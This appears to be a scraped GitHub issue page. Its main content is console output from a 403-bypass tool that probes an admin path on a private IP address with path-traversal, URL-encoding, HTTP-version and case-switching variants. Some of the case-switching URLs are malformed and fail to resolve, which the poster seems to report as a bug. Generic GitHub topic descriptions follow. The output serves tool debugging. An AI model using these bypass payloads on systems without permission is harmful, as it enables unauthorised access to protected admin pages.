404 377 bytes http://172.16.67.124/;/..%2f%2f../admin/
404 372 bytes http://172.16.67.124/;/..admin/
404 375 bytes http://172.16.67.124/;//%2f../admin/
404 374 bytes http://172.16.67.124/\..\.\admin/
βββββββββββββ HTTP VERSIONS βββββββββββββββ
403 372 bytes HTTP/1.0
403 353 bytes HTTP/1.1
403 353 bytes HTTP/2
βββββββββββββ CASE SWITCHING ββββββββββββββ
2024/03/19 01:59:49 parse "http://172.16.67.124admi%6E/": invalid URL escape "%6E"
0 bytes http://172.16.67.124admi%6E/
2024/03/19 01:59:49 parse "http://172.16.67.124%61dmin/": invalid URL escape "%61"
0 bytes http://172.16.67.124%61dmin/
2024/03/19 01:59:49 parse "http://172.16.67.124a%64min/": invalid URL escape "%64"
0 bytes http://172.16.67.124a%64min/
2024/03/19 01:59:49 parse "http://172.16.67.124ad%6Din/": invalid URL escape "%6D"
0 bytes http://172.16.67.124ad%6Din/
2024/03/19 01:59:49 parse "http://172.16.67.124adm%69n/": invalid URL escape "%69"
0 bytes http://172.16.67.124adm%69n/
2024/03/19 01:59:49 Get "http://172.16.67.124admiN/": dial tcp: lookup 172.16.67.124admiN on 8.8.8.8:53: no such host
0 bytes http://172.16.67.124admiN/
2024/03/19 01:59:49 Get "http://172.16.67.124admIn/": dial tcp: lookup 172.16.67.124admIn on 8.8.8.8:53: no such host
0 bytes http://172.16.67.124admIn/
2024/03/19 01:59:49 Get "http://172.16.67.124aDmin/": dial tcp: lookup 172.16.67.124aDmin on 8.8.8.8:53: no such host
0 bytes http://172.16.67.124aDmin/
2024/03/19 01:59:49 Get "http://172.16.67.124Admin/": dial tcp: lookup 172.16.67.124Admin on 8.8.8.8:53: no such host
0 bytes http://172.16.67.124Admin/
2024/03/19 01:59:49 Get "http://172.16.67.124adMin/": dial tcp: lookup 172.16.67.124adMin on 8.8.8.8:53: no such host
0 bytes http://172.16.67.124adMin/
Thanks in advance!
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
π Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. πππ
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google β€οΈ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.